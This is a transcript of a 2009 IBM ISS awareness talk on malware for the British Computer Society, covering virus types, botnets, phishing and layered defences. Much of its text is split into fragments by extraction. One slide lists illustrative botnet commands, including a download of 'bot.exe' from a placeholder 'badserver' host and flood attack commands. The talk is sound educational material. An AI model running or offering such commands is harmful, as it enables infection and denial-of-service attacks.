Malware: Just How Safe are You! - British Computer Society · 2011-10-19 · intended but the user...

ISS –X-Force Professional Security Services

British Computing Society -October 22nd 2009

©2009 IBM Corporation

Malw

are

:Ju

st

Ho

w S

afe

are

Yo

u!

–Martin Overton

–Malware/Anti-M

alware SME

ISS X-Force –Professional Security Services


2British Computing Society -October 22nd 2009

Agenda �The Problem

–Malware, what it is and how it works

–Identity Theft, Bots, Extortion & Mules

�What can I do about it?

�Conclusions

�Questions




Disclaimer

�Products named in this presentation are

used as examples only, and should not

be taken as any form

of endorsement by

IBM.

�All trademarks and copyrights are

acknowledged.




The Battlefield

�Y

ou

r C

om

pu

ter

•Computers are really, really

complex.

•We don’t have the foggiest idea

what our computers are doing

•So m

any targets, so little time

�Y

ou

r B

rain

•The weakest link in m

ost security

is the human being behind the

keyboard




The Problem…Malware




Definitions:-

�V

iru

s"A computer program that can infect other computer programs or

[system areas] by m

odifying them to include a copy (possibly modified)

of itself.”-Dr. Frederick Cohen, Computer Virus Theory & Experiments.

�T

roja

n“A Trojan Horse is a program that does something that its programmer

intended but the user is not expecting.”

“Viruses must replicate to be classed as viruses and Trojans don't

replicate.”

�W

orm

“A worm

is a program that makes copies of itself. It may do damage

and compromise the security of the computer, but it doesn't replicate by

changing a hosts code or files.”-“Viruses infect, worm

s infest”

�M

alw

are

*“Code that causes unwanted effects: Such as viruses, Trojans (including

Remote Access Trojans (RATS)), worm

s and the side-effects thereof.”

*Malicious Softw

are




“Viruses are an 'Urban Myth', just like the

alligators that live in the New York

sewers.”

Peter Norton 1988

Definition:-Virus




More Definitions:

�B

ackd

oo

r aka

RA

T:-“A program that is installed on a victims PC to

allow remote access and full control of the victims PC. They are

classified

as a sub-class of Trojans as they are frequently installed without the

knowledge of the victim”

–Think of it as a ‘remote control’for the victims computer!

�B

len

ded

th

reat:-“M

alware which use m

ultiple m

ethods (vectors) and

techniques (methodologies/exploits/payloads) to propagate and attack

systems and networks. (Also known as Cocktail Malware)”

–Examples include: CodeRedand family, Nimda, Goner, Gokar,

Scalper, Slapper, Klez, Yaha, etc




0

100

200

300

400

500

600

700

Tota

l

Num

ber

of

Vir

uses

Thou

sand

s

1 9 8 6

1 9 8 7

1 9 8 8

1 9 8 9

1 9 9 0

1 9 9 1

1 9 9 2

1 9 9 3

1 9 9 4

1 9 9 5

1 9 9 6

1 9 9 7

1 9 9 8

1 9 9 9

2 0 0 0

2 0 0 1

2 0 0 2

2 0 0 3

2 0 0 4

2 0 0 5

2 0 0 6

2 0 0 7

2 0 0 8

2 0 0 9

Year

Kno

wn

Pre

dict

ed

Vir

us G

row

th -

Ru

nn

ing

To

tal

(by year: actual and predicted)



10


0

2000

0

4000

0

6000

0

8000

0

1000

00

1200

00

1400

00

1600

00

1800

00

Num

ber

of n

ew

Vir

uses

1 9 8 6

1 9 8 8

1 9 9 0

1 9 9 2

1 9 9 4

1 9 9 6

1 9 9 8

2 0 0 0

2 0 0 2

2 0 0 4

2 0 0 6

2 0 0 8

Year

Kno

wn

Pre

dict

ed

Vir

us G

row

th (

Actu

al)

(by year: actual and predicted)



11


The Changing Face of the Threat

�It was easy when everything

was a virus…

–File infectors

–Boot infectors

–Multipartile (File/Boot)

–Macro

–Script

�Now viruses are just one category of

Malware …

–Viruses

–Worm

s

–Trojans

–Backdoors

–Bots, Zombies

–Adware

–Spyware

–Blended Threats

–Applications, Security/Hacking Tools

–Key loggers

–Rootkits



12


Why create malware?

�N

ew

Mo

tivati

on

s:

–Theft of intellectual property,

personal data

–Extortion / blackmail

–Use stolen m

achines to

carry out attacks, send

spam, etc.

–Make m

oney, and lots of

it…

�T

yp

icall

y w

ritt

en

to

ord

er

by

pro

fessio

nal p

rog

ram

mers

fo

r p

rofe

ssio

nal

cri

min

als

…

�In

oth

er

wo

rds i

t is

no

w a

ll

ab

ou

t…

�O

ld M

oti

vati

on

s:

–Curiosity

–Malice or revenge

–Peer recognition

–Political or other causes

–Fame or infamy

–Boredom

–Anarchy

�T

yp

icall

y w

ritt

en

by a

teen

ag

e

male

…



13


How do they arrive or get on my PC?

�E

ma

il (

lin

ks

an

d a

ttac

hm

en

ts)

�W

eb

sit

es

(d

ow

nlo

ad

s, o

r via

ex

plo

its)

�In

sta

nt

Me

ssa

gin

g (

do

wn

loa

ds

, o

r via

e

xp

loit

s)

�S

oc

ial E

ng

ine

eri

ng

�S

oc

ial N

etw

ork

ing

(T

wit

ter,

Fac

eb

oo

k,

XIN

G, L

inked

In)

�U

SB

de

vic

es

(in

clu

din

g p

ho

ne

s a

nd

ip

od

s)

�W

ind

ow

s s

ha

res

, p

oo

r p

as

sw

ord

s,

ex

plo

its

�F

lop

py d

isc

s a

nd

in

fecte

d f

ile

s (

alm

os

t a

ny f

ile

typ

e n

ow

, in

clu

din

g P

DF

s!)



14


What do they do on, and to my PC?

�In

sta

ll t

hem

selv

es

�O

ften

dis

ab

le s

ecu

rity

to

ols

in

pla

ce (

an

ti-m

alw

are

&

pers

on

al

fire

wall

)

�In

vit

e o

ther

malc

od

e i

n t

o p

art

y o

n y

ou

r P

C

�S

teal

data

(cre

dit

card

in

form

ati

on

, b

an

k d

eta

ils,

so

ftw

are

keys

, etc

.)

�In

sta

ll a

backd

oo

r to

all

ow

rem

ote

ac

ces

s/c

on

tro

l

�L

oo

k f

or

oth

er

syste

ms t

o i

nfe

ct

�Jo

in a

bo

tnet

�S

en

d S

pam

, p

art

icip

ate

in

a D

Do

Satt

ack,

ho

st

Ph

ish

ing

o

r M

alw

are

files o

r w

eb

sit

e, u

sed

to

sto

re s

tole

n o

r il

leg

al

mate

rial,

an

d s

o o

n…

�D

ele

te f

iles,

reg

istr

y k

eys,

form

at

the H

D,

co

rru

pt

file

s,

ho

ld f

iles t

o r

an

so

m…



15


Latest Stats

�2

33

% g

row

th in

th

e n

um

be

r o

f m

alic

iou

s s

ite

s in

th

e la

st

six

m

on

ths

an

d a

67

1%

gro

wth

du

rin

g t

he la

st

ye

ar.

�7

7%

of

We

b s

ite

s w

ith

ma

lic

iou

s c

od

e a

re le

git

ima

te s

ite

s

that

ha

ve

be

en

co

mp

rom

ise

d.

�9

5%

of

co

mm

en

ts t

o b

log

s, c

hat

roo

ms

an

d m

ess

ag

e b

oard

s

are

sp

am

or

ma

lic

iou

s.

�5

7%

of

da

ta-s

tea

lin

g a

ttac

ks

are

co

nd

uc

ted

ove

r th

e W

eb

.

�8

5.6

% o

f a

ll u

nw

an

ted

em

ails

in

cir

cu

lati

on

co

nta

ine

d lin

ks

to

sp

am

sit

es

an

d/o

r m

alic

iou

s W

eb

sit

es

.



16


Virus Payload Animations



17


Other Virus Screenshots



18




19


Swen



20


CodeRedSpread



21


The Slammer Worm

�E

xp

loit

ed

a w

ell

-kn

ow

n W

ind

ow

s b

ug

fo

r w

hic

h a

patc

h a

lread

y

exis

ted

�If

a v

uln

era

ble

bo

x r

eceiv

es a

sin

gle

in

fecte

d 3

76-b

yte

packet,

it

beco

mes i

nfe

cte

d

�O

nce a

mach

ine i

s i

nfe

cte

d, it

uses a

ll a

va

ilab

le b

an

dw

idth

to

fir

e

ou

t in

fecte

d p

ackets

to

ran

do

m a

dd

resses

–100 M

b connection = 30,000 infected packets per second

�M

ost

vu

lnera

ble

mach

ines i

nfe

cte

d w

ith

in t

en

min

ute

s

�S

lam

mer

carr

ied

no

paylo

ad

–Mayhem caused by the traffic levels it generated

•Brought down ATM m

achines

•Grounded airliners

•Caused power outages (allegedly)



22


Slammer Spread



23


Converged Threat –Conficker (aka Downadup)



24


Linux Viruses

�F

as

test

gro

win

g o

pera

tin

g s

ys

tem

–Linux OS gaining popularity

–Increased Linux deployment

�L

inu

x v

iru

s g

row

th in

cre

as

e

–50 known viruses in 2001

–Over 5,000 current known viruses

(source:TrendMicro)

�P

rote

cti

on

mo

re c

om

ple

x t

ha

n W

inX

X

–OS kernel level consistency (RTS)

–AV vendor reluctance to support multiple and

easily modified kernels



25


OSX/Leap-A aka OSX/Ooompa-A

�Infects Mac OS X Operating

System.

�The worm

makes use of the

Spotlight search program,

included in OSX, and will run

each time the machine boots.

�Uses iChatto send the

infected file –latestpics.tgz–

to all contacts on the infected

user’s buddy list.



26


Instant Messaging & Internet Relay Chat

�Many m

alware now include IM as an infection vector

�Most use port 80, which is next to impossible to restrict

unauthorized outbound traffic.

�Many bots now spread via IM.

�Bypasses Gateway AV.

�Vulnerable to hackers.

�Weak (or no) encryption.

�Mainly rely on Social-Engineering



27


Mobile/Cabir

�This proof-of-concept worm

spreads

through BLUETOOTH-enabled

devices.

�When it arrives, a series of messages

appear. These messages warn the

user of the possible m

alicious nature

of the file before finally being

installed.

This worm

has its Product ID set to

(0x101F6F88), which basically

targets Series 60 v0.9. The said

setting is the m

ost common and

conservative choice for a basic

application because it is compatible

to all existing Series 60 devices.

Marib–Cabirwith M

MS functionality

too…

Some Series 60 devices are as follows:

Phones based on Nokia Series 60 Developer Platform

2.0 (Nokia 7610,

Nokia 6620, Nokia 6600, Panasonic X700)

Phones based on Nokia Series 60 Developer Platform

1.0

(Nokia 7650, Nokia 3650, 3600, Nokia 3660, 3620, Nokia N-

Gage, Siemens SX1, SendoX)



28


Dutsaka Dust

�This proof-of-concept virus is a parasitic file

infector. It is the first known virus for the PocketPC

platform

. Dutsaffects ARM-based devices only.

targets W

indows CE / PocketPC devices.

�Dutscontains two m

essages that are not

displayed:

“This is proof of concept code. Also, i wanted to

make avers happy. The situation when Pocket PC

antivirusesdetect only EICAR file had to end ...”

�The other one is a reference to the science-fiction

book Perm

utation City by Greg Egan, where the

virus got its intended name from: “This code arose

from the dust of Perm

utation City “



29


More Definitions:

�S

pyw

are

:-the generic name for any application that may track your

online and/or offline PC activity and is capable of locally saving or

transmitting those findings for third parties sometimes with butmore

often without your knowledge or consent.

–Spyware comes in many form

s including adware, key

loggers, Trojans, browser hijackers, and diallers.

�K

eylo

gg

er:

-a type of system m

onitor that has the ability to record all

keystrokes on your computer. Therefore, a keyloggercan record and

log your e-m

ail conversations, chat room conversations, instant

messages, and any other typed m

aterial. They have the ability torun in

the background, hiding their presence.



30


Spyware -Key Logger -Example

What a great program!

This was just an outstanding program. I’ve had no problems with it

running, and had no problems installing it. This program ran inthe

background under stealth m

ode and let m

e catch m

y cheating husband

in the act of sending emails and instant messages to his m

istress. He

never even suspected the program was on the computer.

I highly recommend this program if, like me, you are looking to catch

a two-tim

ing rat. W

e are now divorced, and needless to say, the

program has paid for itself m

any, many tim

es over.



31


Malware extortion



32


Definitions:-

�Bot •'Bot' is a contracted (truncated or short) name for a software robot.

A bot is a piece of software that allows a system to be remotely

controlled without the owner’s knowledge; it can also be used to

automate common tasks such as on IRC aka drone or zombie.

�Botnet

•A group ['Herd' or 'Network'] of Zombie systems controlled by the

'Bot Herder’. These botnets are told what to do by the botnet owner.

This can be anything that the bot has been programmed to

do....including updating itself or installing new malicious software.

�Bot Herder

•The person [or group] which “own”and control a herd of bots. Also

known as the Bot Master aka Zombie Master.



33


Definitions:-

�DDoS[aka Distributed Denial of Service]

–A distributed denial-of-service attack is an attack on a

computer system or network from multiple co-ordinated

systems connected to the same network which are

perform

ing a denial of service attack.

�IRC –“Internet Relay Chat (IRC) is a form

of instant

communication over the Internet. It is mainly designed for

group (many-to-m

any) communication in discussion forums

called channels, but also allows one-to-one communication.



34


Infection/Propagation M

ethods

Vulnerabilities, e.g. RPC, DCOM, LSASS, MSSQL

Dictionary attack, Open W

indows Shares [SMB]

E-m

ail, Mytob, Bagle, Mitgleider, etc.

Existing Backdoor, Bagle, Mydoom, etc.

Download from website via dropper [e-m

ail or Instant Messaging]

Update or install new components from website or ftp server

Update M

ethods

Peer 2 Peer File Sharing.



35


IRC

Server

Bot Herder

Re

po

rt f

or

Du

ty

Once infected the bot signs

in to the IRC servers

dedicated ‘bot’channel for

instructions.

Exa

mp

le ‘

bo

tne

t’c

om

ma

nd

s

Sca

n f

or

mo

re v

icti

ms

to

pre

ss

-ga

ng

in

to s

erv

ice:

Advscan

lsass

200 5 0 –b

Up

da

te t

he

‘b

ot’

so

ftw

are

:http.updatehttp://badserver/bot.exe

c:\msupdate.exe1

Att

ac

k!

Ddos.syn

xxx.xxx.xxx.xxx

80 900

Udp

xxx.xxx.xxx.xxx.xxx

20000 100000 10

Sp

am

, S

pa

m,

Sp

am

…Spam.setlist

Spam.settemplate

Spam.start

Se

nd

Ord

ers

All bots connected to the

IRC servers dedicated ‘bot’

channel receive and carry

out the instructions.

DNS

Server



36


Bot Herder

Botnet

Scan and ‘Sploit

Victim

DDoS

Victim

Spam, 419, or

Phishing

Victim

Malware

or

Dropper

DNS

Server

IRC

Server



37


Size of the Problem

�T

he

Ho

ne

yn

et

pro

ject

en

titl

ed

: “K

no

w y

ou

r E

ne

my:

Tra

ck

ing

Bo

tne

ts”

•Logged 226,585 unique IP addresses logging into one of

the IRC botnet C&C channels.

•Botnets ranged in size from several hundred ‘zombies’to

more than 50,000 ‘zombies’.

•They observed 226 DDoSattacks against 99 unique

targets.

•Typical size of a botnet: 2000+ bots [‘zombies’].

•From this data they worked out that the number of bots

required to successfully DDoSa typical company were just

13. This assumes that the company is on a T1 [1.544Mbit]

and that each ‘zombie’has a 128Kbit link [128Kbit x 13 =

1.664Mbit].



38


Definition:-Phishing

�The art of using social engineering to

encourage the user to divulge inform

ation

�The user receives an email directing them

to a website which looks official, but isn’t!

�The user is encouraged to enter account

details, passwords etc.



39




40


The Darker Side Of Phishing

�R

ec

en

tly p

his

hin

g s

ca

ms h

ave

mo

ve

d o

n f

rom

sim

ply

ste

alin

g y

ou

r b

an

k d

eta

ils

to

in

sta

llin

g m

alw

are

on

yo

ur

PC

!



41


Mules

�W

hy s

tore

th

ing

s o

n m

y c

om

pu

ter,

wh

en

I c

an

sto

re

the

m o

n y

ou

rs?

–Broadband makes this feasible

–Easy to do with a Trojan



42


Identity and IP Theft

�Id

en

tity

is

eas

y t

o s

tea

l

–Given access to a m

achine

–All your life is there!

–Very hard to recover from

�T

he

ft o

f c

orp

ora

te d

ata

[In

telle

ctu

al P

rop

ert

y]

–Sold to your competitors

–Beat you to the sale

–Copy/Steal your product

designs, etc.

�T

oo

ls –

Tro

jan

, s

pyw

are

, k

ey

log

ge

r, b

ot



43


Attack Sophistication Increases W

hile Intruder

Sophistication Decreases

�M

eta

-Eve

nts

he

lp id

en

tify

mu

lti-

eve

nt

too

l b

ase

d a

tta

ck

s

HIG

H

LO

W

Att

ack

So

ph

isti

cati

on

LO

W

HIG

H

Intr

ud

er

So

ph

isti

cati

on



44


Th

reat

Co

nverg

en

ce

Rep

lacin

g T

hre

at

Evo

luti

on

�Threat Evolution:

–A flat world has brought

about an unprecedented

amount of criminals and cons

–Attackers keep ROI in mind

as well, and constantly

evolve their wares in order to

re-purpose it for the next

flood of attacks

–High profile vulnerabilities will

still be the vehicles for new

attacks, however, the low

and slow attack vectors

cannot be ignored

–The economics of

exploitation must be taken

into consideration to better

prioritize risk



45


Wh

at

can

I d

o a

bo

ut

it?



46


Anti-M

alware Strategy

�Malware/Spyware/RootkitScanners are ONLY as

good as their LAST UPDATE.

�No 100% solution

•“Anyone that tells you that their product offers

100% protection from viruses are either naïve or

just don’t fully understand the real problem.”

�Best you can expect is 98%, but only if you design

and implement your approach properly.

�Implement a multi-layered defence!



47


Multi-layered Anti-M

alware

What’s That?

�L

ike

an

On

ion

…

–E-M

ail was responsible

for at least 80% of all

malware outbreaks.

–Web filtering/scanning

can block many attacks.

–Updating a few

perimeter machines can

stop new malware from

gaining a beach head.

Personal

Computers

Firewall/Proxy Server

Web Scanning/Mail

Scanning

File/Print Servers



48


Solutions –Tools and Technologies

�A

nti

-Vir

us

–Too many to list

�A

nti

-Ro

otk

itT

oo

ls

–ChkRootkit[*NIX -http://chkrootkit.org/]

–RootkitHunter [*NIX -

http://www.rootkit.nl/projects/rootkit_hunter.html]

–RootkitRevealer[W

intel -

http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.

shtml]

–UnHackme[W

intel -http://greatis.com/unhackme/]

–Blacklight[W

intel -http://www.f-secure.com/blacklight/]

�P

ers

on

al

Fir

ew

all

s

–Too many to list

–Can block internet access to untrustedexecutables –

assuming the malware hasn’t already disabled it!



49


Solutions –Tools and Technologies -Other

�H

on

eyp

ots

an

d H

on

eyn

ets

�ID

S a

nd

IP

S

�P

eri

mete

r fi

rew

alls

�P

art

itio

nin

g y

ou

r n

etw

ork

wit

h r

ou

ter

AC

Ls

an

d in

tern

al fi

rew

alls

�P

atc

h m

an

ag

em

en

t

�S

tro

ng

pa

ssw

ord

s

“In other words, stop them getting onto your systems in the firstplace,

and if they do get in, slow them down,

or increase your ability for early detection.”



50


Applying a Multi-layered Anti-M

alware Personal

Computers

Firewall/Proxy Server

Web Scanning/Mail

Scanning

File/Print Servers

AV Vendor 1

IDS

AV Vendor 2

Content Filtering/Generic

Blocking/Filtering

Kernel Wrappers (Entercept)

Intrusion Prevention Systems

(IntruShield)

AV Vendor 3

Personal Firewalls

Personal IDS

Behaviour Blockers/Sandbox

Integrity Management

PacketShapers(QoS/Packeteer)

NetFlow(Cisco)

Layer 7 Switches

Centralised remote patching of

allsystems

Backups

SMB-Lures, Tarpits, Honeypots, Honeynets,

BillyGoats

Policies and Procedures

Managed Service



51


Putting it all together…

…

Malw

are

Sen

so

rs

SMB-Lures, Tarpits, Honeypots,

Honeynets, BillyGoats

Mu

ltip

le A

nti

vir

us V

en

do

rs

Workstation

Servers

Perimeter (W

eb, FTP and SMTP)

IDS

Using custom m

alware

rules/signatures

Au

tom

ate

d P

atc

hin

g

Centralised remote patching of all

systems via Tivoli, SMS, etc.

Man

ag

em

en

t

Centralised, Geo-centric,

or at least country-centric

Policies (What we want to achieve)

Procedures (How we are going to achieve it)

People (Who’s going to do it)

Products (The technology bit)

Oth

ers

Kernel Wrappers (Entercept)

Personal Firewalls (McAfee/ZoneLabs)

Personal IDS (Blackice)

Generic Blocking/Filtering

Heuristics

Backups

Intrusion Prevention Systems (IntruShield)

Behaviour Blockers/SandBoxTechnology

(FinJanSurfinShield)

Firewalls/Proxies

PacketShapers(QoS/Packeteer)

NetFlow(Cisco)

Layer 7 Switches

Managed e-m

ail virus scanning, anti-spam

service



52


The Best Defence –

End User

�R

eg

ula

rly r

un

a m

alw

are

sc

an

–Keep your anti-m

alware product up-

to-date

�In

sta

ll f

irew

all c

od

e, a

nti

-sp

yw

are

a

nd

an

ti-r

oo

tkit

too

ls

�D

on

’t r

un

Pe

er

to P

ee

r s

oft

ware

�K

ee

p u

p t

o d

ate

wit

h s

ecu

rity

p

atc

he

s

�L

ea

rn a

bit

mo

re a

bo

ut

yo

ur

co

mp

ute

r

–Never, ever run anything you’ve

downloaded or received unless

you’re pretty confident of its source

–Download some tools

–Think!



53


Conclusions…

�Malware is here to stay.

�The problem is going to get worse.

•4-7000+ new m

alware every m

onth. January 2008 was over

13,000!

•More W

orm

s, Bots, Trojans and ‘Blended Threats’appearing.

•Becoming m

ore stealthy and rely m

ore on Social-engineering.

•For profit, no longer for fun…

�More than 600,000 viruses by the end of 2009?

�No m

atter what tricks the m

alware writers use the AV industry will

neutralise it.

–E

ven

tuall

y!

�AV is only one small but important part of an overall anti-m

alware

solution.

�Technology is a small part of an overall solution, user behaviour and

proper security controls m

ust be addressed.



54


Not all computer problems are caused by m

alware…



55


Questions?



56


Contact details…..

Mart

in O

vert

on

EM

EA

Malw

are

/An

ti-M

alw

are

SM

E

IBM

IS

S X

-Fo

rce –

PS

S

�E

-Ma

il:

ove

rto

nm

@u

k.ib

m.c

om

�T

ele

ph

on

e:

+44

(0)2

39

25

63

442

�M

ob

ile:

+44

(0)7

76

46

66

939



57


Useful sites

�Anti-Virus (On-line scanners)

�http://housecall.trendmicro.com/

�http://us.mcafee.com/root/mfs/default.asp

�Links to FREE AV, Personal Firewalls and Anti-Spyware tools

�http://momusings.co.uk/software.aspx

�Recommended Books

�Viruses Revealed (Harley, Slade, Gattiker) –

ISBN 0-07-213090-3

�Hacking Exposed (Scambray, McClure, Kurtz) –ISBN 0-07-212748-1

�Site related to ‘spoof’or ‘rogue’anti-spyware tools.

�http://www.spywarewarrior.com/rogue_anti-spyware.htm



58


Useful sites…cont.

�Hoax, Scam, urban Legend Reference Sites

�http://cluestick.me.uk

�http://snopes.com

�Papers and articles I’ve written

�http://momusings.com/papers

�My Personal ‘Blog’

�http://momusings.com/momusings

�http://momusings.com/vsub



59


Background

�S

un

All

ian

ce /

Ro

ya

l an

d S

un

All

ian

ce

–Joined 1988

–Commissioning PCs, Strategy (hardware and software)

–Responsible for Malware Research/Prevention (10 years)

–Ethical Hacker (2.5 years)

–Helped set up Independent ISS UK User Group

–WildListreporter, Charter member of AVIEN

�O

uts

ou

rced

Ap

ril

2002

–Joined EMEA IGS Security June 2002 as Malware/Anti-M

alware SME

–Moved to M

SSD (EMEA) June 2004 to set up EMEA Virus CERT

–Member of Global Virus CERT

–Lead Computer Forensics Analyst for EMEA

–Moved to ISS X-Force Professional Security Services April 2008

�21 Y

ears

of

kn

ow

led

ge o

n m

alw

are

an

d r

ela

ted

secu

rity

th

rea

ts.

Malware: Just How Safe are You! - British Computer Society · 2011-10-19 · intended but the user...

Documents

Transcript of Malware: Just How Safe are You! - British Computer Society · 2011-10-19 · intended but the user...